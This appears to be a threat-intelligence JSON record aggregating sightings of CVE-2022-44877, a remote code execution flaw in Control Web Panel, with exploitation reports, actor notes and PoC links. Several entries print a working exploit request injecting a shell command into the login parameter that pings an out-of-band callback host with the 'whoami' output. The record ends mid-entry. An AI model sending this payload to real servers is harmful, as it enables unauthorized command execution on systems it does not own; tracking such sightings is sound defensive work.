{"vulnerability": "CVE-2022-44877", "sightings": [{"uuid": "c5a0d98b-fdf2-4e8f-897c-38e3d10da020", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2023-06-14T21:10:04.000000Z"}, {"uuid": "a5a5008f-67b3-402b-9fbb-6de14289a759", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2971755", "content": "", "creation_timestamp": "2024-12-24T20:33:40.714634Z"}, {"uuid": "8e8fff02-daed-449e-ae39-e6d0056029b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:45.000000Z"}, {"uuid": "2a79d232-8915-43c6-9f28-32509c09244b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:49.000000Z"}, {"uuid": "415903d4-4ba5-4482-94ee-5a059dd2eb6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:40.000000Z"}, {"uuid": "69aed977-f504-4263-b5c8-9ef64fa79095", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/control_web_panel_login_cmd_exec.rb", "content": "", "creation_timestamp": "2023-01-31T14:53:19.000000Z"}, {"uuid": "791da008-8cee-4d4d-a29c-3e3bff2bd236", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "seen", "source": "MISP/d17bd6ef-d68b-317b-ac33-cdbc44c5fc57", "content": "", "creation_timestamp": "2025-08-31T03:13:03.000000Z"}, {"uuid": "f3fc014f-fb6f-4cdd-a6b2-138dfb373d00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2022-44877", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/8419ae1b-d239-4b01-a77a-b24315ae92fb", "content": "", "creation_timestamp": "2026-02-02T12:27:06.398006Z"}, {"uuid": "357fe18c-c90e-45b2-a19b-c1d6a7b2a294", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "exploited", "source": "https://t.me/cKure/10601", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 \ud83d\udce2 CVE-2022-44877: Vulnerability with 9.8 severity in Centos Web Panel 7.0 is under active exploit.\n\nIt is an unauthenticated RCE.\n\nhttps://arstechnica.com/information-technology/2023/01/vulnerability-with-9-8-severity-in-control-web-panel-is-under-active-exploit/", "creation_timestamp": "2023-01-13T11:15:59.000000Z"}, {"uuid": "95ebbc1b-7a82-46f7-aa7b-90d7898fa27c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3935", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aRed Team\n\u63cf\u8ff0\uff1aRed Team utilities for setting up CWP CentOS 7 payload &amp; reverse shell (Red Team 9 - CW2023)\nURL\uff1ahttps://github.com/hotpotcookie/CVE-2022-44877-white-box\n\n\u6807\u7b7e\uff1a#Red Team", "creation_timestamp": "2023-03-13T04:32:52.000000Z"}, {"uuid": "6bd65a6e-4bf2-4bfc-bd95-ad66d2dafe6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3789", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aRed Team\n\u63cf\u8ff0\uff1aRed Team utilities for setting up CWP CentOS 7 payload &amp; reverse shell, as it refers to CVE-2022-44877\nURL\uff1ahttps://github.com/hotpotcookie/cwp-rce-white-box\n\n\u6807\u7b7e\uff1a#Red Team", "creation_timestamp": "2023-02-15T15:27:38.000000Z"}, {"uuid": "480baea3-cbed-4a24-8d68-bf205aecd6a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "seen", "source": "https://t.me/EthicalSecure/46", "content": "\ud83d\udcbb CrystalRay xakerlar guruhi va SSH-Snake qurti\n\nSysdig tadqiqotchilari joriy yilning fevral oyidan buyon 1500 dan ortiq qurbonlarning ma'lumotlarini o'g'irlagan va ularning tizimlariga kriptominerlarni o'rnatgan CrystalRay nomli yangi kiberjinoyatchilar guruhi haqida xabar berishdi .\n\nBu xakerlar assotsiatsiyasi buzilgan serverlardan SSH kalitlarini o'g'irlaydigan va buzilgan tarmoqlar bo'ylab mustaqil ravishda tarqaladigan SSH-Snake qurtidan foydalanadi.\n\nCrystalRay Shodan kabi xizmatlar orqali ommaviy skanerlashdan foydalanadi, zaifliklardan foydalanadi va orqa eshiklarni o'rnatadi. Jinoyatchilar o'z hujumlarida zmap, asn, httpx, yadrolar, platypus va SSH-Snake vositalaridan foydalanadilar.\n\nGuruhning asosiy maqsadi hisob ma'lumotlarini o'g'irlash va sotish, kriptominerlarni o'rnatish va qurbonlar tizimlariga kirishni ta'minlashdir. Ular o'zgartirilgan ekspluatatsiyalar va Sliver asboblar to'plamidan foydalanadilar.\n\nCrystalRay o'z faoliyatida quyidagi zaifliklardan faol foydalanadi:\n\n\ud83d\uddc4 CVE-2022-44877 : Boshqaruv veb-panelidagi (CWP) zaiflik;\n\n\ud83d\uddc4 CVE-2021-3129 : Ignition-da xato (Laravel);\n\n\ud83d\uddc4 CVE-2019-18394 : Ignite Realtime Openfire-da zaiflik.\n\nSSH kalitlarini olgandan so'ng, SSH-Snake qurti ulardan yangi tizimlarga kirish, o'zini nusxalash va yangi xostlarda jarayonni takrorlash uchun foydalanadi. Bundan tashqari, SSH-Snake nafaqat infektsiyani tarqatadi, balki qo'lga kiritilgan kalitlarni va hujumlar tarixini xakerlarning C2 serveriga yuboradi va keyingi hujumlar uchun imkoniyatlar yaratadi.\n\n@EthicalSecure", "creation_timestamp": "2025-06-25T05:46:17.000000Z"}, {"uuid": "2d4d004e-6d66-454a-92b1-3641e860120b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "seen", "source": "https://t.me/ctinow/87854", "content": "US CISA adds Centos Web Panel RCE CVE-2022-44877 to its\u00a0Known Exploited Vulnerabilities Catalog\n\nhttps://ift.tt/feAN6wi", "creation_timestamp": "2023-01-19T11:38:15.000000Z"}, {"uuid": "b7a66f8a-3253-4848-b552-50a68c72de5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "exploited", "source": "https://t.me/ctinow/86969", "content": "Control Web Panel Vulnerability, CVE-2022-44877, Actively Exploited in the Wild - Security Boulevard\n\nhttps://ift.tt/EAY3VUu", "creation_timestamp": "2023-01-14T13:46:42.000000Z"}, {"uuid": "03e41d23-1787-41fc-baa7-a37c8bfee294", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "exploited", "source": "https://t.me/ctinow/86963", "content": "Control Web Panel Vulnerability, CVE-2022-44877, Actively Exploited in the Wild\n\nhttps://ift.tt/EAY3VUu", "creation_timestamp": "2023-01-14T10:56:27.000000Z"}, {"uuid": "93425ddf-67da-4522-a62c-f14963a1b431", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "Telegram/jMJyadT3qc-lkVlS3NqgZVp45jvUhGcXJlopuseaLsWvi6M", "content": "", "creation_timestamp": "2023-04-01T14:25:41.000000Z"}, {"uuid": "bc0c378f-35cb-4c05-82cf-331e27d66b98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "Telegram/dnB1GUjf0v9LFGmoVZrpJEAc_h4H9AJQZzfZfG_3ZxYWjuY", "content": "", "creation_timestamp": "2023-03-31T20:23:19.000000Z"}, {"uuid": "09d70b4e-d481-4892-882d-8dc298f6bcbf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "Telegram/gjl5Uy3V92u60R1A6ThsEPRpU8GiWdUXTnqzjNgz90vk3Tk", "content": "", "creation_timestamp": "2023-02-02T06:35:01.000000Z"}, {"uuid": "936cb716-7234-4985-8a67-3c2a7ea1bd36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "seen", "source": "Telegram/LBlGBEhemJZkwQPO2E1CN0fUgXVoXgX8BpkxvKB6zhychcA", "content": "", "creation_timestamp": "2023-01-17T10:27:05.000000Z"}, {"uuid": "020921a0-017f-4415-b572-e6b3d2e04d8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "Telegram/9VSrl9zLun59PPbfDpr8xiPX8yfhb9CmNOfmFPOZuDJD3w", "content": "", "creation_timestamp": "2024-05-05T11:58:13.000000Z"}, {"uuid": "7e5e619a-4b79-40b3-b828-619cdacc6532", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/jj_8tl/74", "content": "#CVE-2022-44877 Control Web Panel Unauth #RCE \n\nPOC: \nPOST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}whoami.{{interactsh-url}}) HTTP/1.1\nHost: vuln\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&amp;password=toor&amp;commit=Login", "creation_timestamp": "2024-11-24T14:30:15.000000Z"}, {"uuid": "0fbc0436-d3a0-4142-8b35-b557b136178e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "seen", "source": "https://t.me/arpsyndicate/268", "content": "#ExploitObserverAlert\n\nCVE-2022-44877\n\nDESCRIPTION: Exploit Observer has 37 entries related to CVE-2022-44877. login/index.php in CWP (aka Control Web Panel or CentOS Web Panel) 7 before 0.9.8.1147 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the login parameter.\n\nFIRST-EPSS: 0.974350000\nNVD-IS: 5.9\nNVD-ES: 3.9", "creation_timestamp": "2023-11-19T14:48:50.000000Z"}, {"uuid": "5fe42db6-9702-45b0-b71d-f40a4d3a7758", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/WARLOCK_DARK_ARMY_OFFICIALS/4192", "content": "CVE-2022-44877\n\nControl Web Panel Unauth RCE\n\nPOC usage:\n\nPOST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}whoami.{{interactsh-url}}) HTTP/1.1\nHost: vuln\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&amp;password=toor&amp;commit=Login", "creation_timestamp": "2024-05-04T07:41:16.000000Z"}, {"uuid": "b18f58ea-74fd-4fb4-b233-93d01fa4ad24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "exploited", "source": "https://t.me/Web_Security_Live/54", "content": "\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Contol Panel \u2014 CVE-2022-44877\n\n9,8/10 \u0431\u0430\u043b\u043b\u043e\u0432 \u043f\u043e \u0448\u043a\u0430\u043b\u0435 CVSS. \n3 \u044f\u043d\u0432\u0430\u0440\u044f 2023 \u0433\u043e\u0434\u0430 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b Gais Cyber   Security \u0441\u043e\u043e\u0431\u0449\u0438\u043b\u0438 \u043e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0435 \u0432 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0432 \u043e\u043a\u0442\u044f\u0431\u0440\u0435 \u043f\u0440\u043e\u0448\u043b\u043e\u0433\u043e \u0433\u043e\u0434 \u0438 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 PoC-\u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u0434\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.\n\u0422\u0440\u0438 \u0434\u043d\u044f \u0441\u043f\u0443\u0441\u0442\u044f \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0438, \u0447\u0442\u043e \u0445\u0430\u043a\u0435\u0440\u044b \u0443\u0436\u0435 \u0432\u0437\u044f\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0430 \u0432\u043e\u043e\u0440\u0443\u0436\u0435\u043d\u0438\u0435, \u0442\u0430\u043a \u043a\u0430\u043a \u0441 \u0435\u0435 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043d\u0435\u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u044b\u043c \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c \u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c \u0434\u0440\u0443\u0433\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u043c\u0430\u0448\u0438\u043d\u044b.\n\nCVE-2022-44877 \u0431\u044b\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0435\u0449\u0435 \u0432 \u043e\u043a\u0442\u044f\u0431\u0440\u0435 2022 \u0433\u043e\u0434\u0430, \u0432 \u0441\u043e\u0441\u0442\u0430\u0432\u0435 CWP 0.9.8.1147.\n\n\ud83d\udd18 https://t.me/web_security_live", "creation_timestamp": "2023-01-16T13:26:13.000000Z"}, {"uuid": "7fb967a4-aaba-47f7-b3ca-361209b82295", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/1271", "content": "CVE-2022-44877\nControl Web Panel Unauth RCE\nPOC usage:\nPOST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1\nHost: vuln\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&amp;password=toor&amp;commit=Login", "creation_timestamp": "2023-01-08T18:21:47.000000Z"}, {"uuid": "b20ad28f-4019-4a7b-8040-ede2f4996c44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/1261", "content": "CVE-2022-44877\nCentos Web Panel 7 Unauthenticated Remote Code Execution\ndownload\n\n#centos #rce", "creation_timestamp": "2023-01-06T08:11:28.000000Z"}, {"uuid": "c6df947f-49af-4f3c-8617-467cce9f5c36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "Telegram/-Agm6CxDAHpFekuPHljhtLzEIw4YdZciyyWEP66WVyC4Mao", "content": "", "creation_timestamp": "2023-02-01T14:26:05.000000Z"}, {"uuid": "15314648-fbc4-4e93-8db0-3fa75d0c6bf1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "Telegram/AY73a6VopayuGS3sFVnT6risuhBjZYNN4wypwEk7jXZmWRA", "content": "", "creation_timestamp": "2023-02-01T08:26:05.000000Z"}, {"uuid": "be3bae59-ea43-4182-91c0-892694bfbc0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/MrVGunz/647", "content": "CVE-2022-44877 : Centos Web Panel 7 - Unauthenticated Remote Code Execution \nPOC : https://github.com/numanturle/CVE-2022-44877", "creation_timestamp": "2023-01-07T18:30:10.000000Z"}, {"uuid": "e2e0008d-4792-4fa6-91f7-2e3da9dbdcaa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/MrVGunz/1102", "content": "CVE-2022-44877 \u06a9\u0646\u062a\u0631\u0644 \u067e\u0646\u0644 \u0648\u0628 \u0628\u062f\u0648\u0646 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a #RCE\n\n\u0627\u062b\u0628\u0627\u062a \u0645\u0641\u0647\u0648\u0645:\nPOST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}whoami.{{interactsh-url}}) HTTP/1.1\nHost: vuln\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&amp;password=toor&amp;commit=Login\nCVE-2022-44877 Control Web Panel Unauth #RCE \n\nPOC: \nPOST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}whoami.{{interactsh-url}}) HTTP/1.1\nHost: vuln\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&amp;password=toor&amp;commit=Login", "creation_timestamp": "2024-05-11T19:55:16.000000Z"}, {"uuid": "5ba4ba9c-c797-4f90-b13d-375a0b094cde", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/true_secator/5965", "content": "Sysdig \u0441\u043e\u043e\u0431\u0449\u0430\u0435\u0442 \u043e\u0431 \u0430\u043a\u0442\u0438\u0432\u0438\u0437\u0430\u0446\u0438\u0438 \u0430\u0442\u0430\u043a \u043d\u043e\u0432\u043e\u0439 \u0433\u0440\u0443\u043f\u043f\u044b CRYSTALRAY, \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u043d\u043e\u0439 \u043d\u0430 \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0435 \u0441\u0440\u0435\u0434\u044b, \u0447\u0438\u0441\u043b\u043e \u0436\u0435\u0440\u0442\u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0432\u043e\u0437\u0440\u043e\u0441\u043b\u043e \u0441\u043e 100 \u0434\u043e 1500.\n\nSysdig \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u044e\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u0441 \u0444\u0435\u0432\u0440\u0430\u043b\u044f, \u043a\u043e\u0433\u0434\u0430 \u043e\u043d\u0438\u00a0\u0432\u043f\u0435\u0440\u0432\u044b\u0435 \u0441\u043e\u043e\u0431\u0449\u0438\u043b\u0438\u00a0\u043e\u0431 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 \u0438\u043c\u0438 \u0447\u0435\u0440\u0432\u044f \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c\u00a0SSH-Snake\u00a0\u0434\u043b\u044f \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0441\u0432\u043e\u0438\u0445 \u0430\u0442\u0430\u043a \u0438 \u0433\u043e\u0440\u0438\u0437\u043e\u043d\u0442\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u044f \u043f\u043e \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u043c \u0441\u0440\u0435\u0434\u0430\u043c.\n\nSSH-snake - \u044d\u0442\u043e \u0447\u0435\u0440\u0432\u044c \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043a\u0440\u0430\u0434\u0435\u0442 \u0437\u0430\u043a\u0440\u044b\u0442\u044b\u0435 \u043a\u043b\u044e\u0447\u0438 SSH \u0441\u043e \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0438\u0445 \u0434\u043b\u044f \u043b\u0430\u0442\u0435\u0440\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u044f \u043d\u0430 \u0434\u0440\u0443\u0433\u0438\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u043e\u0434\u043d\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e \u0441\u0431\u0440\u0430\u0441\u044b\u0432\u0430\u044f \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443.\n\n\u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u043d\u0430\u0431\u043b\u044e\u0434\u0435\u043d\u0438\u044f\u043c Sysdig, \u0432 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 \u043d\u0435\u0434\u0435\u043b\u0438 CRYSTALRAY \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0430\u0441\u0448\u0438\u0440\u0438\u043b \u043c\u0430\u0441\u0448\u0442\u0430\u0431\u044b \u0441\u0432\u043e\u0435\u0439 \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0432 10 \u0440\u0430\u0437, \u043d\u0430 \u0434\u0430\u043d\u043d\u044b\u0439 \u043c\u043e\u043c\u0435\u043d\u0442 \u0436\u0435\u0440\u0442\u0432\u0430\u043c\u0438 \u0441\u0442\u0430\u043b\u0438 1500 \u0447\u0435\u043b\u043e\u0432\u0435\u043a, \u0447\u044c\u0438 \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0431\u044b\u043b\u0438 \u0443\u043a\u0440\u0430\u0434\u0435\u043d\u044b, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0437\u0430\u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0438\u0435 \u0432 \u0438\u0442\u043e\u0433\u0435 \u043a\u0440\u0438\u043f\u0442\u043e\u043c\u0430\u0439\u043d\u0435\u0440\u044b.\n\n\u041d\u043e\u0432\u0430\u044f \u0442\u0430\u043a\u0442\u0438\u043a\u0430 \u0432\u043a\u043b\u044e\u0447\u0430\u0435\u0442 \u043c\u0430\u0441\u0441\u043e\u0432\u043e\u0435 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435, \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044e \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0438 \u0440\u0430\u0437\u043c\u0435\u0449\u0435\u043d\u0438\u0435 \u0431\u044d\u043a\u0434\u043e\u0440\u043e\u0432 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 OSS, \u0432 \u0447\u0438\u0441\u043b\u0435 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 zmap, asn, httpx, nuclei, platypus.\n\n\u0426\u0435\u043b\u044c CRYSTALRAY - \u0441\u0431\u043e\u0440 \u0438 \u0432\u043e\u0437\u043c\u0435\u0437\u0434\u0438\u044f \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445, \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u0435 \u043a\u0440\u0438\u043f\u0442\u043e\u043c\u0430\u0439\u043d\u0435\u0440\u043e\u0432 \u0438 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0430 \u0443\u0441\u0442\u043e\u0439\u0447\u0438\u0432\u043e\u0441\u0442\u0438 \u0432 \u0441\u0440\u0435\u0434\u0435 \u0436\u0435\u0440\u0442\u0432\u044b. \n\nSysdig \u043f\u043e\u043b\u0430\u0433\u0430\u0435\u0442, \u0447\u0442\u043e CRYSTALRAY \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043c\u043e\u0434\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 PoC, \u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u043c\u044b\u0435 \u0446\u0435\u043b\u044f\u043c \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u044f \u043f\u043e\u0441\u0442-\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 Sliver.\n\n\u0421\u0440\u0435\u0434\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u044b\u0435 CRYSTALRAY \u043d\u0430\u0446\u0435\u043b\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u0441\u0432\u043e\u0435\u0439 \u0442\u0435\u043a\u0443\u0449\u0435\u0439 \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438: 